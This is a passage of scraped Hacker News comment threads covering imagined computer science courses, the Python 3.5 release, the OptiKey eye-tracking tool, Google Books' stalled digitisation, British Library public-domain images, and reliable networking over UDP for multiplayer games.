There was one instance where, in a multiprocess environment, one of the engineers wrote a library to access a database table and read its contents. In the process he/she maintained a cache of it in memory. Then somebody else decided to use that convenience library in a different process, and so on. Essentially, cache coherence problems were left unsolved, and when I brought this to people's attention they shrugged it off, saying they might handle a problem when they see one - which may be fine, but it seemed like some key computer science concepts were overlooked in the goal of achieving software reuse (here, reuse of the existing accessor/cache code for the database).

I have seen design choices that cause race conditions or non-deterministic behavior, following some pattern or cargo-cult programming because something is an industry trend, etc.

simonw 2 days ago 1 reply      
I love "Unlearning Object-Oriented Programming".
hackerboos 2 days ago 3 replies      
These are Software engineering mostly and not CompSci.
jason_s 2 days ago 0 replies      
smrtinsert 2 days ago 0 replies      
COMP000 Your Job Isn't Only Fun Shit
bb0wn 2 days ago 0 replies      
This would more aptly be titled 'Software Engineering Courses That Don't Exist, but Should.'
cLeEOGPw 2 days ago 0 replies      
These should exist if universities had a goal of producing not scientists, but workers.
matthewbauer 2 days ago 1 reply      
CSCI 0201: Principles of Version Control
FrankenPC 2 days ago 0 replies      
Reminds me of a question a help desk person asked me about 20 years ago. They were having all kinds of problems printing Word docs from a new Windows 95 PC. I was busy at the time, so rather than educate them on the nature of WYSIWYG I just told them to update/repair the graphics driver. It worked and they thought I was a god.

It's hard to create a course on the interconnections of everything. The best course I ever took was a Cisco IOS programming course. That included protocol analysis, debugging routers, switches, etc. I'm not a network layer programmer. But what I learned about how everything works together has helped me solve complex problems ranging from Kerberos authentication issues to finding duplicate DHCP servers on the same network. Without this knowledge, I would have to hire experts and waste a ton of time and money to get to the end goal which is a functioning product.

garfieldnate 22 hours ago 0 replies      
I would take that classical programs class in a heartbeat. That seems like something that could be organized online somewhere.
EugeneOZ 15 hours ago 0 replies      
"I'm so cool I'm going against the crowd" bullshit.
bwang29 2 days ago 3 replies      
How about a "class" or some pre-session on best practices for typing on the keyboard in CS departments?

For years I've struggled to type without looking at the keyboard, and I make frequent typos which slow me down. Being able to type quickly and having a good habit of placing fingers on the keyboard seems like an important exercise. A guideline for choosing the right keyboard, or setting up personal shortcuts or a customized keyboard layout for each developer, might also be worth learning.

spydum 2 days ago 1 reply      
Automotive Metaphors and analogies for programmers

Seriously, why does every analogy have to be a car? Is it just the most complex system we can model in our heads?

msoad 2 days ago 0 replies      
Where I come from Software Engineering and Computer Science are two different paths.
zyxley 2 days ago 1 reply      
I'd like to suggest a course in: how to argue with management about system or vendor implementations that you know will affect both future development time and user experience within your company.
thinkingfish 2 days ago 0 replies      
CSCI 3350: Debugging- Beyond Print

CSCI 4600: When Big-O Complexity Becomes a Lie and Why

smegel 2 days ago 0 replies      
CSCI 2550: Software complexity and the art of Keeping It Simple.
kevindeasis 2 days ago 0 replies      
CSCI 099: How to apply what you learned in comp sci.
2sk21 2 days ago 0 replies      
No disagreements except that I might rename "Classical Software Studies" as "Software archeology"
asgard1024 2 days ago 0 replies      
Classical software studies? What about System 370, CP/CMS, IMS, CICS? There is so much that was forgotten.
pjtr 2 days ago 0 replies      
CSCI 0001 'RTFM & Learning simple facts yourself outside a CS course'
loaaa 2 days ago 0 replies      
Another course should be network security for everyone
gull 2 days ago 0 replies      
How to program by listening to your intuitions, not logically.
kriro 2 days ago 0 replies      
CSCI 3300 kind of exists in human computer interaction.
jecjec 2 days ago 0 replies      
How about:

-Mastering Git (/competitors)


-Project Management

-History of consumer information technology

alt_f4 2 days ago 0 replies      
dave_chenell 2 days ago 0 replies      
this is so good
Python 3.5.0 python.org
398 points by korisnik  11 hours ago   119 comments top 22
redsymbol 8 hours ago 3 replies      
Python 3 keeps getting better and better. I've been writing more code in Python 3 than 2 for about three years now, and I absolutely love it. When I have to write code in 2.7 now, it feels like shifting from fifth gear down to second.
ceronman 8 hours ago 0 replies      
So far, this is my favorite 3.x release. Type annotations, async/await, unpacking generalizations. Lots of cool new features. Too bad that PEP 0498 [1] didn't make it into this release; we'll have to wait for 3.6.

[1] https://www.python.org/dev/peps/pep-0498/
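The features named above can be sketched in a few lines; the names and values below are illustrative only, not from the release itself:

```python
import asyncio
from typing import List

# PEP 484: optional type annotations, checkable by external tools like mypy.
def mean(xs: List[float]) -> float:
    return sum(xs) / len(xs)

# PEP 492: native coroutines with async/await syntax.
async def delayed(value, seconds=0):
    await asyncio.sleep(seconds)
    return value

# PEP 448: additional unpacking generalizations.
merged = {**{"a": 1}, **{"b": 2}}   # {'a': 1, 'b': 2}
combined = [*range(3), *range(2)]   # [0, 1, 2, 0, 1]

loop = asyncio.new_event_loop()
result = loop.run_until_complete(delayed("done"))
loop.close()
```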

ricw 11 hours ago 5 replies      
By far the most exciting news here, to me, is the PEP 484 typing module. Typing support would eliminate one of Python's biggest weaknesses. Furthermore, having it optional means the language can remain as easy to play and prototype with while becoming "more professional."

The other features are all well rounded, with co-routines having quite some potential, though I'd have to play around with them first to assess them.

Now if everything would please start moving on to Python 3 pretty please ;).

pdknsk 10 hours ago 8 replies      
PEP 0448, in addition to the already-implemented PEP 3132, makes it very tempting to switch. If PEP 0448 had unpacking in comprehensions I'd switch. (There doesn't seem to be a follow-up PEP just for that functionality yet.)


It'd be really nice to use this.

 >>> [*range(i) for i in range(5)]
Instead of this monstrosity right now.

 >>> [x for y in (range(i) for i in range(5)) for x in y]
Python 2.7 has some minor features that 3 dropped unfortunately, which still makes me hesitate.

Such as filter keeping the type. In 3 it returns an iterator.

 >>> filter(lambda x: x in 'ABC', 'ABCDEFA')
 'ABCA'
Or this mostly cosmetic feature.

 >>> filter(lambda x: x[0] > x[1], ((1, 2), (4, 3)))
 >>> filter(lambda (x, y): x > y, ((1, 2), (4, 3)))  # equivalent, error in 3
Also dropped. (It's slower than using the dedicated base64 module though.)

 >>> 'Python'.encode('base64')
 'UHl0aG9u\n'
Also, I like print.
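For reference, the Python 3 counterparts of the 2.7 snippets above can be approximated like this (itertools.chain stands in for the wished-for comprehension syntax):

```python
import base64
from itertools import chain

# The flattened comprehension, spelled with chain.from_iterable instead:
flat = list(chain.from_iterable(range(i) for i in range(5)))

# Python 3's filter returns an iterator; rebuild the concrete type explicitly:
kept = "".join(filter(lambda x: x in "ABC", "ABCDEFA"))  # 'ABCA'

# Tuple-unpacking lambdas are gone; index (or unpack inside the body) instead:
pairs = list(filter(lambda p: p[0] > p[1], ((1, 2), (4, 3))))  # [(4, 3)]

# The dropped str.encode('base64') maps to the dedicated base64 module:
encoded = base64.b64encode(b"Python")  # b'UHl0aG9u'
```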

1st1 10 hours ago 0 replies      
jcadam 7 hours ago 3 replies      
I'd love to use Python 3. Alas, I work in the defense industry and am working on a new development project in Python 2.6. Why? Because that's the version that's already installed on the client's systems, and getting anything new installed is such a nightmare of Vogon-esque policies and procedures that I've learned not to even ask.

I'm constantly having to hack around bugs in ancient versions of libraries that were fixed years ago, for the same reason.

I have a feeling the slow adoption rate of python 3 is not due to developers "rejecting" it.

kayman 3 hours ago 1 reply      
My experience:

I've tried Python 3 and enjoy it very much. A few things drove me nuts at first, trying to figure out why syntax that worked in Python 2 was no longer working in Python 3. But a little bit of googling and I was on my way with Python 3.

I have a project that I started a long time ago in Python 2 using web.py. I tried to migrate to Python 3, but unfortunately web.py is not supported. I know Flask has Python 3 support and I could migrate to that, but I'm not ready to move my whole code base over yet.

As someone who tried to migrate to Python 3 with no compelling reason to and hit a roadblock, I immediately shelved the problem till later, as I'm not missing anything critical from Python 3 to warrant the effort.

I wonder how many other projects go through this? Especially much larger, more complex code bases.

baxter001 10 hours ago 1 reply      
The scandir update also changes the underlying implementation of os.walk giving loads of production apps a huge speed increase by making use of additional data returned by the os calls.
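The win comes from PEP 471's os.scandir, whose DirEntry objects carry file-type and stat information returned by the OS call itself, so walking a tree no longer needs a separate stat() per name. A small sketch of using scandir directly (the helper is hypothetical, and the context-manager form shown requires 3.6+):

```python
import os

def total_file_size(path):
    """Sum the sizes of regular files one directory deep via os.scandir."""
    total = 0
    with os.scandir(path) as it:
        for entry in it:
            # is_file()/stat() use data cached from the directory read
            # where the OS provides it, avoiding extra system calls.
            if entry.is_file(follow_symlinks=False):
                total += entry.stat(follow_symlinks=False).st_size
    return total
```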
thomasahle 2 hours ago 0 replies      
I love all the performance improvements to the standard library. That Serhiy Storchaka has made an impressive number of contributions, and doesn't seem to be working for anyone?
wheaties 10 hours ago 2 replies      
Does this mean that asyncio will be deprecated as there's now 2 ways to accomplish much of the same thing or do they truly have different semantics?
ctolsen 5 hours ago 0 replies      
Awaiting an official release (and my PR being merged), I made a Docker image which is simply an upgrade of the official one: https://hub.docker.com/r/ctolsen/python/

Also, pytest users might want to use their dev version for now until they fix a 3.5 issue.

dkarapetyan 4 hours ago 2 replies      
Python somehow always manages to miss the mark. The new co-routine stuff is a good example. Who can explain to me how I return more than once from the same co-routine? That is what a co-routine is, after all, no?
wpietri 8 hours ago 5 replies      
I've recently joined a Python project, my first time working with the language. We're currently using Python 2.7. How do experienced Pythonistas decide if/when to upgrade to 3.x? I figured it was a no brainer given that it has been 7 years with a number of big releases, but Flask's warning on this topic put me off:


bbrazil 9 hours ago 0 replies      
PEP 0475 makes me happy; I've had to work around interrupted syscalls a few times.
sandGorgon 8 hours ago 3 replies      
Question - is there any web/API framework that leverages asyncio? This implicitly also means first-class DB/ORM support.

Flask, SQLAlchemy, etc. seem to be using gevent and Python 2.7.

incepted 8 hours ago 2 replies      
And yet, Python 2 usage is still strong while Python 3 adoption has actually slowed down, and at this rate, it will probably stop being used completely while Python 2 continues to live on:


jeo1234 8 hours ago 0 replies      
Very pleased to see PEP 465. In many ways I think Python is one of the most exciting languages in terms of where it is going and what it is trying to do.
mixmastamyk 7 hours ago 0 replies      
There are some other nice nuggets in there.

* The new subprocess.run() function provides a streamlined way to run subprocesses.

Yeah! I've implemented that function a dozen times in projects, I suppose because it was too trivial to put on pypi.

* collections.OrderedDict is now implemented in C, which makes it 4 to 100 times faster.

Nice, I use this one relatively often.
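For anyone who hasn't used it yet, subprocess.run is the one-shot wrapper around Popen: run a command, wait, get a CompletedProcess back. A minimal example (the child command is just an illustration):

```python
import subprocess
import sys

# Run a command to completion and collect its output.
proc = subprocess.run(
    [sys.executable, "-c", "print('hello from the child')"],
    stdout=subprocess.PIPE,
    universal_newlines=True,  # decode bytes to str (3.5's spelling of text=True)
)
print(proc.returncode)  # 0 on success
print(proc.stdout)      # 'hello from the child\n'
```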

cmacke 9 hours ago 0 replies      
It's about time I switched to Python 3.
kozukumi 6 hours ago 0 replies      
The new Windows installer is nice. It has needed updating for a long time so glad to see it get some love finally.
dancsi 6 hours ago 0 replies      
I am impressed that it upgraded cleanly over my previous installation of Python 3.5 release candidate.
gwpolenti 7 hours ago 3 replies      
Could someone explain how to properly install Python 3.5.0 on Ubuntu so that it replaces the system's default Python 3.4.0 as the new default? Installing is the easy part, but I haven't figured out how to also make sure all the libraries that come with Python are also replaced with the 3.5 versions. Thanks!
OptiKey Full computer control and speech with your eyes optikey.org
430 points by aw3c2  3 days ago   80 comments top 20
kozukumi 3 days ago 2 replies      
From the get started page

 "If you are unsure which computer/laptop/tablet to purchase and are considering spending a lot of money then please email me - I can offer personal advice on how to target the sweet spot between cost and performance (and screen size)."
So not only is he giving away this amazing software, but he is also offering free, personal advice on what you need to buy, working within your budget!

Truly an inspiring person.

dageshi 3 days ago 4 replies      

A lot of interesting information from the author over there.

META: Interesting to note how much cool stuff is turning up on reddit first before it appears here... I feel like it used to be the other way around.

exhilaration 3 days ago 1 reply      
Could this be covered by existing patents? Tools like these for the disabled are a big business, and patent holders have shut down competition in the past: http://www.disabilityscoop.com/2012/06/14/dispute-ipad-app-p...
mcbuilder 2 days ago 1 reply      
I wonder how well the hardware would work with an input system like Dasher. Dasher was an experiment in statistical inference and tries to be an accessibility tool as well. http://www.inference.phy.cam.ac.uk/dasher/. I found it really fun to play around with and could get decent speeds, but not great. It's true that eye-tracking hardware is prohibitively expensive. When we ordered an eye tracker for the lab, it ended up costing us 10K.
mh-cx 3 days ago 1 reply      
I wonder if you can combine this with Vim so that you could use it for lightning fast cursor movement and selections and still use the keyboard for anything else.
malnourish 3 days ago 0 replies      
This is amazing software and I'm glad something like this is open source. Accessibility hardware often costs a fortune (for understandable reasons) and software isn't typically cheap either. This seems to be very high quality and it has the potential to really improve people's lives. I'm glad things like this exist.
gragas 3 days ago 3 replies      
This is amazing software, but will it work for me? My left eye is a glass eye and it has little to no movement.
dwiel 3 days ago 1 reply      
I have been using voicecode.io (with dragon naturally speaking) and IR head tracking so that I don't have to use my hands for anything now with pretty good success. The head tracking mouse has a much smaller learning curve, but programming by voice has been rewarding as well.
morley 3 days ago 2 replies      
This could be a really nice keyboard interface for VR too.
neilmovva 3 days ago 1 reply      
Great work. I wonder if the author had heard of the Eyewriter project [1]? Similar system, fully open source, but I'm not sure how active development is nowadays. It's been up since ~2011, though, so quite old by software standards (uses openFrameworks/openCV). Still, it worked impressively well when I built a derivative system.

The accessibility space needs as much open-source development as possible - most of the commercial tech, if you can find it, is locked down and outdated.

[1]: http://www.instructables.com/id/The-EyeWriter-20/

daturkel 2 days ago 0 replies      
Readers here may appreciate: I spoke with the dev for a piece on OptiKey: http://www.businessinsider.com/an-eye-tracking-interface-hel...
aluhut 3 days ago 1 reply      
Can someone elaborate on the use of eye trackers in dark rooms (rooms lit only by dimmed lights or the monitor itself)? Does it work?
ximeng 2 days ago 1 reply      
https://www.justgiving.com/Julius-Sweetland - also raising money for a cancer charity at the same time.
rsmith05 3 days ago 2 replies      
As someone that suffers from RSI, I'd be interested in an Opti-mouse.

Does this exist yet?

curiousjorge 3 days ago 0 replies      
this is so mind blowingly good.
andhess 3 days ago 1 reply      
You should take a look at EyeFluence - they have developed some incredible techniques to type with your eyes using non-dwell methods.
sanqui 3 days ago 1 reply      
I wonder if a version of this for mobile phones could make typing on a phone faster than fumbling with a touch screen.
melling 3 days ago 3 replies      
In the demo, he was quick and he didn't even seem to use much autocompletion. However, I wonder if using a different keyboard layout would be helpful. Dvorak and Colemak, for example, place the more frequently used letters on the home row, so you'll spend more time with your eyes there. You can evaluate different layouts with a tool like this:


jparishy 3 days ago 0 replies      
Pretty cool, fellow Julius!
samstave 3 days ago 1 reply      
Here is an idea: Tell me if this is stupid:

Assume you have a bunch of HUDs/AACs/Glasses/Whatever that are using this tracking tech. Assume that they are ONLY looking at the real world, not some online data/webpage etc...

There is a camera that either is fwd looking or also 360 looking.

Use the tech to eye-track exactly what MANY people are looking at, to train an AI as to which items in the real world are important.

i.e. "the ground exists and we know its there, thus its priority in information is low" however "these signs that are being looked at have a higher context priority, and require understanding"

By doing this on a fair scale... you could train AI to use the information of "what's visually important to human navigation" to train them to navigate. This augments what other ML/AI stuff has already been going on...

I do not know if this is basically how self driving cars were developed -- but now that you have a seed of this tracking tech in open source -- it could blossom.

What Ever Happened to Google Books? newyorker.com
290 points by jeo1234  1 day ago   111 comments top 18
chippy 1 day ago 7 replies      
This reminds me of people's attitudes towards reCAPTCHA - started by researchers at Carnegie Mellon University. "Stop spam, read books."

Everyone was supportive of it when it was used towards the non profit digitization of out of copyright books. So, started externally, Google ran with it and continued and expanded the range of books. It remained good. Apparently loads of books were digitized.

Then - possibly along with the change in this article, or along with the perceptible change within Google a few years back where everything had to be business-accountable - reCAPTCHA started being used to digitize address numbers from Street View to improve Google's online mapping and geocoding offerings. Nothing to do with books, nothing to do with improving the world.

Now reCAPTCHA is being used for image recognition and training (identify the images with salads). Nothing to do with books, information, or improving the world - everything to do with Google's own offerings.

What's even sadder is that http://captcha.net/ still states that it is being used to "help digitize books", but all the links go to https://www.google.com/recaptcha/intro/index.html, which has all but removed any public-benefit wording. "Stop spam, read books" was removed from Google's site in 2014.

jrochkind1 1 day ago 1 reply      
This article leaves out some important things.

Google making the project non-profit would not have saved them from the lawsuit. The Author's Guild, separately, sued a non-profit partner in the Google Books scanning project -- HathiTrust. [1]

That lawsuit was not resolved until 2012 -- when, without a settlement, HathiTrust won on fair use.

The court decided that scanning books for searching was fair use. While the court did not say the same for displaying full text -- what the OP wants -- it is notable that the court's opinion was not primarily based on non-profit status of the organization (as is common in U.S. fair use case law; the non-profit factor has generally dwindled in court decision-making), but on transformativeness.

The OP mentions "Others argued that the settlement could create a monopoly in online, out-of-print books," but gives that opinion rather short shrift. This was a very real concern -- what if Google's use really would be fair use? If the court decided that, the opinion would apply as precedent to everyone. But a settlement really does apply only to Google -- no one else even had access to the terms of the settlement. Anyone else trying to do the same would risk being subject to a decade-long lawsuit of their own.

The OP should ask, why didn't Google go to trial?

"If Google was, in truth, motivated by the highest ideals of service to the public...." they should have gone to trial to establish the right for all. As HathiTrust did.

The Google Books project still exists; they did not take it down because of legal worries, even in the absence of the settlement. But it has indeed been allowed to languish. While I'm sure the multi-year lawsuit contributed to this, Google starting ambitious projects and then allowing them to languish -- without improvement, without fulfilling their original promise, slowly degrading and withering away -- is a pretty common Google practice even without multi-year lawsuits.

[1] https://en.wikipedia.org/wiki/Authors_Guild,_Inc._v._HathiTr...

espes 1 day ago 2 replies      
Shout out to the Internet Archive, a non-profit close to what the author describes. Unfortunately it turns out book scanning is expensive and rights-holders still don't like it.


wyclif 1 day ago 2 replies      
I was an early and enthusiastic fan of Google Books. I often do research that relies heavily on 17th-19th century English academic works, which is right in the Google Books public domain sweet spot.

But something went awry - I'm not sure what - and the project was allowed to languish by Google. The interface has been in maintenance mode for ages, with no development going on. This leads to a lot of frustration: for instance, you cannot share all of your saved and tagged books with another user, and sharing a shelf or series of shelves is awkward and clunky. In terms of UX, it appears to be abandonware.

On top of that, there's no way to know what's going on or who to talk to, because users can't actually contact anyone at Google Books.

walterbell 1 day ago 1 reply      
In June 2015, the US Copyright Office issued their report with draft legislation, "Orphan Works and Mass Digitization", after consultation with creators, libraries and tech companies. This guidance can be used by the US Congress to create laws permitting Google Books and other efforts to digitize orphaned works.


oneJob 1 day ago 0 replies      
Attempting to force Google to change course on this would at best result in an empty gesture on Google's part with likely no follow up regarding the bigger project. They may open up what is already scanned, but they're not likely to resume the project under benevolent terms.

Employment used to last a lifetime. One could retire from Sears with decent benefits if they were loyal. Today, many of us are contract employees or Uber-style "partners". This is the same phenomenon we see happening here, just on the product side. We've been going down this road for a while now. You often don't buy products that last a lifetime anymore. It's often necessary to buy a whole new one rather than fix the one you already have, because the replacement parts aren't made available. So, it's happened to our workforce and our products, and now it is also happening to our companies. Always in the name of profit. Fair-weather friends.

Sometimes this is good. Sometimes it is bad. Almost always it is a false choice.

The logic of capitalism insists on competition and specialization, which are often at odds with cooperation and leisure. Why should Google need to choose between the bottom line and benefiting its community by sharing the work they've already accomplished? In a word: competition.

To me, this is the greatest strength of open-source. It allows for cooperation and facilitates transparency, the very foundations of community. Open-source has done nothing to stymie specialization, one of the main thrusts of "The Wealth of Nations". The other, self interest serving the whole, I think, has been shown by history and OSS to be one possible, but not the sole, idea regarding what motivations might facilitate a productive community.

So, back to Google Books. What happened to Google Books is exactly what one should expect to have happened in a political-economy such as ours. A different outcome would not necessarily have resulted from different decisions by Google, but by different incentives and structures of a different economic framework. Let's not be distracted by the red herring of this anecdote, framing it as a one off, but instead look to this anecdote as a case study in a much larger domain.

njharman 1 day ago 0 replies      
> split fifty-fifty between authors and publishers

Why? If anything it should be split between copyright holders, whoever they are. Legally, 'author' and 'publisher' are meaningless.

But really, if we can't get it together as a culture to eliminate perpetual copyright, we should at least make a rule that if a work is not available (in print or online) for 5 years then it is deemed abandoned and no longer under copyright. Available doesn't mean free.

Our cultural heritage is a shared resource. It is not right for it to be locked away.

yannis 1 day ago 1 reply      
>The thrilling thing about Google Books, it seemed to me, was not just the opportunity to read a line here or there; it was the possibility of exploring the full text of millions of out-of-print books and periodicals that had no real commercial value but nonetheless represented a treasure trove for the public.

I had the same excitement as the author when Google Books came out. The service has stagnated over the years. Reading snippets is such a frustrating experience (you cannot even cut and paste the text). Even books for which one can buy an ebook are not available in some countries. Many times it is quicker to search archive.org to find related books digitized by Microsoft.

We still have a long way to go where knowledge can be distributed at low cost and in abundance ...

giancarlostoro 1 day ago 1 reply      
If they could somehow make those books accessible through a "Google All Book Access" type of service that enhanced your searches to include all their scanned books, it would be amazing. They would, however, have to figure out how to make such a service affordable while still keeping publishers 'happy'.
ching_wow_ka 1 day ago 2 replies      
I can say pretty certainly that all the text they've gathered through the Google Books project is in use in their language models and other AI models for their search engine, speech recognition, etc.

They got what they wanted. I can't see what incentive they have as a business to grant access to the books that justifies paying employees for it.

hanlec 1 day ago 0 replies      
> I have a simpler suggestion, nicknamed the Big Bang license. Congress should allow anyone with a scanned library to pay some price - say, a hundred and twenty-five million dollars - to gain a license, subject to any opt-outs, allowing them to make those scanned prints available to institutional or individual subscribers.

Wouldn't this be great? Many of these materials are not indexed, and the chances of discovering them decrease every day. On top of that, getting access to these materials is, for many, almost impossible (out of print, not available in libraries, etc.)

quink 1 day ago 0 replies      
Somewhat related: http://www.theatlantic.com/technology/archive/2012/03/the-mi...

> Because of the strange distortions of copyright protection, there are twice as many newly published books available on Amazon from 1850 as there are from 1950.

Additionally, The Walt Disney Company is sure to get legislation passed before 2024 to extend copyright once more.

pervycreeper 1 day ago 0 replies      
My biggest pet peeve with Google Books is that too many books which are presumably in the public domain have access to them restricted. Not sure if this is an oversight, or on purpose.
tuxt 1 day ago 0 replies      
>But, of course, leaving things to Congress has become a synonym for doing nothing, and, predictably, a full seven years after the court decision was first announced, we're still waiting.

Ha, never thought about that 7 years ago. :)

jay_kyburz 1 day ago 0 replies      
The author's Big Bang licence is a bit crazy. Why not just monetise books in exactly the same way they monetise video on YouTube?

Surely the copyright law is quite similar.

joesmo 1 day ago 0 replies      
So these books that the fight has been about are out of print and essentially do not exist anymore. They do not make money for anyone. They do not contribute to anyone or anything. For all intents and purposes, they might as well not have existed at all. Google tries to make a library of these nonexistent works so that they can once again benefit humanity and the copyright holders (which is pretty much never the authors when it comes to books) are upset because they're losing out on their $0 of profit. Yeah, copyright law really works well in this country.
marincounty 1 day ago 2 replies      
"If Google was, in truth, motivated by the highest ideals of service to the public, then it should have declared the project a non-profit from the beginning, thereby extinguishing any fears that the company wanted to somehow make a profit from other peoples work."

I think Google might win over some critics if they resumed the project; set it up as a non-profit, but not some slick non-profit that really doesn't help anyone other than Google?The bylaws would be lawyer proof, and BOD proof. The out of print(out of copyright) books would be available to anyone for free.

I was very excited about this project, and it did seem to just die?

I used to like and defend Google. As of the last few years, with the tracking, plethora of Ads, and the way they ruined YouTube, at least for me.(Yea, I didn't like the way they took it over. I don't like all the advertisements. Plus, I still have embarrassing videos up there that I literally can't get off. Some kind of password screwup that is beyond the helpful customers at the "Help Boards". See Google employees can't be bothered with trivial stuff like my videos. (I asked, and was told to figure it out.)

So Google, if you are listening, go back to your roots. Some people, including myself, hold no loyality to your company anymore. My sister uses Bing. I used to tell her, you might like Google better. Those days are long gone. I'd tell her about Duckduckgo, but it's just not quite their yet.

The British Library Puts Over 1M Images in the Public Domain openculture.com
214 points by benbreen  3 days ago   11 comments top 4
scholia 3 days ago 1 reply      
Interesting... but the million images were released in December 2013.


acabal 2 days ago 2 replies      
To be clear, the images are already in the public domain; that is, they are not restricted by copyright. What the British Library has done is make these public domain images accessible via a web interface.

Their status as images belonging to the public is not related to their being made accessible by the British Library.

colinramsay 2 days ago 2 replies      
Related: does anyone know the "best practice" around digitising photos and images? What file format is used? What scanning equipment? What's the standard resolution/DPI used?
dvliman 3 days ago 1 reply      
In case anyone is interested in the Mechanical Curator bot source code: https://github.com/BL-Labs/embellishments

Is it just me or is networking really hard? gafferongames.com
317 points by rinesh  17 hours ago   164 comments top 24
ggambetta 15 hours ago 7 replies      
I've written a series of articles about this topic: http://gabrielgambetta.com/fast_paced_multiplayer.html It's usually well received, perhaps because it builds the ideas from the ground up and does not include the words "What the fuck is wrong with you?".
chetanahuja 7 hours ago 3 replies      
"You cant even imagine a way that reliability could be implemented on top of UDP that beats TCP? What total bullshit"

This. This "TCP already does it best in every situation" is a common trope usually spouted by people who know nothing about what TCP does and why. The easiest way to get over this misconception is to ask yourself, can you think of a protocol that not only works well over all sorts of networks, all the way from two boxes connected by a 10Gig switch (with 10us ping latency) vs two hosts talking to each other via a satellite link (with perhaps, 2 second ping latency) but is the best option across all those situations?

The truth is that TCP is the common denominator that's available in pretty much every device you would want to use. But in almost every individual use case, you could come up with a far better protocol if you took the time and effort to treat the problem seriously.
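As a concrete illustration of "reliability on top of UDP" that works differently from TCP, here is a toy Python sketch (no real sockets; all names are invented for illustration) of one common game-networking trick: instead of retransmit timers, every outgoing packet redundantly carries all not-yet-acknowledged messages, so a single lost datagram costs nothing as long as any later packet arrives.

```python
# Toy model of per-message reliability layered over an unreliable transport.
# TCP-style timers are replaced by redundancy: each packet repeats every
# message the peer has not yet acknowledged.

class ReliableEndpoint:
    def __init__(self):
        self.next_seq = 0
        self.unacked = {}      # seq -> payload, kept until acked
        self.delivered = {}    # seq -> payload, as seen on the receive side

    def send(self, payload):
        self.unacked[self.next_seq] = payload
        self.next_seq += 1

    def outgoing_packet(self):
        # Every packet carries all unacked messages.
        return dict(self.unacked)

    def receive_packet(self, packet):
        self.delivered.update(packet)
        return set(packet)     # ack every sequence number we saw

    def receive_acks(self, acks):
        for seq in acks:
            self.unacked.pop(seq, None)

a, b = ReliableEndpoint(), ReliableEndpoint()
a.send("fire"); a.send("jump")
dropped = a.outgoing_packet()                  # pretend this packet is lost
acks = b.receive_packet(a.outgoing_packet())   # the next packet still has both
a.receive_acks(acks)
assert b.delivered == {0: "fire", 1: "jump"}
assert a.unacked == {}
```

A real implementation would bound the unacked set and handle sequence-number wraparound; this is only the core idea.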

drxzcl 10 hours ago 2 replies      
I know this attitude all too well. I've replied to a few questions on gamedev.stackexchange with pointers to the usual articles on game-state synchronization and lag compensation, and I get lukewarm reactions of the "too complicated" type. Meanwhile, Mr. RPC-over-TCP gets tens of upvotes and the accepted answer.

Their loss I suppose.

OliverJones 12 hours ago 10 replies      
I sometimes ask the question "how does the internet work?" in interviews. The vague and wrong answers I hear are astonishing. I'm looking for a basic understanding of the layering of TCP, or RDP, or ICMP (or anything actually) on top of IP. I don't get that level of insight much. The people who do have that insight usually can go deeper -- slow-start, BGP, etc.

I wonder if we have a modern version of C.P. Snow's mid-twentieth-century two cultures lament. https://en.wikipedia.org/wiki/The_Two_Cultures. That's the complaint that educated humanities folks don't know the basics of science.

Are we miseducating our so-called "full-stack" engineers by not offering them a basic understanding of telecom? Or are they not listening?

babuskov 14 hours ago 4 replies      
I'm thinking of adding online multiplayer to my game: http://store.steampowered.com/app/363670

...so this was a very interesting read. I investigated a little bit and found that there are more protocols than just pure UDP, and now I can't decide which one to try. I narrowed it down to these three:

* PCC http://modong.github.io/pcc-page/

* NORM http://www.nrl.navy.mil/itd/ncs/products/norm

* ENet over UDP http://enet.bespin.org/

What do you think?

Arnt 14 hours ago 0 replies      
Networking has local time, like the theory of relativity. "Those two packets are at the same time at point a, but not at point b." "A sends b and C sends d, but since time is local you cannot" etc.

So IMO it makes sense that networking is really hard. I like it, though. Networking problems are clear when you think hard about them, unlike so many of today's programming problems, where the key is knowing some half-documented aspect of a large framework/library/whatnot.

hebdo 11 hours ago 0 replies      
Well, technically speaking any multiplayer game is a distributed database, except that more inconsistency is tolerated ("lag"). But all of the classic results, such as CAP or FLP, apply here as well. And given how hard even the simple distributed protocols are (eg. Paxos) it should not be a surprise that writing a good networking stack for a multiplayer game is also hard.
jokoon 9 hours ago 0 replies      
TCP is suitable for "flat" static content that you retrieve only at occasional intervals and that is relatively large. A good example is a file which won't change for the next 5 minutes, and you know that you want that exact file BUT you are ready to wait until it loads perfectly.

UDP is for real-time, continuous data, when you can't wait for your hardware to check for packet consistency.

A good analogy is paper mail versus a telephone call. The paper mail will arrive, but you don't care if your phone line cuts out for 1 second. You just wait for the other guy to check whether he can hear you.

UDP is really much better when you want performance, especially when it comes to responsiveness and latency, and you can afford to lose packets.

I think it boils down to people not realizing how hard it is to transmit data over long distances, and that the protocols can't assume data transmission is 100% reliable, because it never is. You can have a lot of interference in your network, but TCP will always manage to land those packets.

Animats 5 hours ago 1 reply      
It's not that networking is really hard, it's that development of synchronized games that run over unreliable links is really hard.

If you want a simple solution for a simple game, here's one. Use a fixed-format UDP packet to pass current location and orientation of the player and whatever else changes rapidly. This should be stateless; if you lose a packet, the next one has a full state update. This is enough for a simple FPS game.

Anything else goes over one or more TCP connections. If you have to load assets (level maps, textures, etc.) just use HTTP over TCP, which means you get to use standard servers and client software for that stuff.

If your game is too complex for that model, you're probably going to have to do some serious thinking about distributed synchronization.
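The stateless fixed-format packet described above can be sketched like this (a hypothetical Python layout; the field list and format string are invented for illustration, not taken from any real game):

```python
# Fixed-format, stateless player-state packet: every packet carries the
# full state, so a dropped datagram needs no recovery at all -- the next
# packet simply supersedes it.
import struct

# player_id (u32), x, y, z, yaw, pitch (f32), tick (u32) -- hypothetical fields
STATE_FMT = "<I5fI"

def pack_state(player_id, x, y, z, yaw, pitch, tick):
    return struct.pack(STATE_FMT, player_id, x, y, z, yaw, pitch, tick)

def unpack_state(data):
    player_id, x, y, z, yaw, pitch, tick = struct.unpack(STATE_FMT, data)
    return {"player_id": player_id, "pos": (x, y, z),
            "yaw": yaw, "pitch": pitch, "tick": tick}

pkt = pack_state(7, 1.0, 2.0, 0.0, 90.0, 0.0, 1234)
state = unpack_state(pkt)
assert state["pos"] == (1.0, 2.0, 0.0) and state["tick"] == 1234
```

In a real game the packed bytes would be handed to `sendto` on a UDP socket; the point here is only that each packet is self-describing and fixed-size.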

staunch 15 hours ago 2 replies      
> We have the Tribes Networking Model, The Unreal Networking Model, Valve Latency Compensation article.

Which are all derivatives of the Quake model.

ilurk 7 hours ago 2 replies      
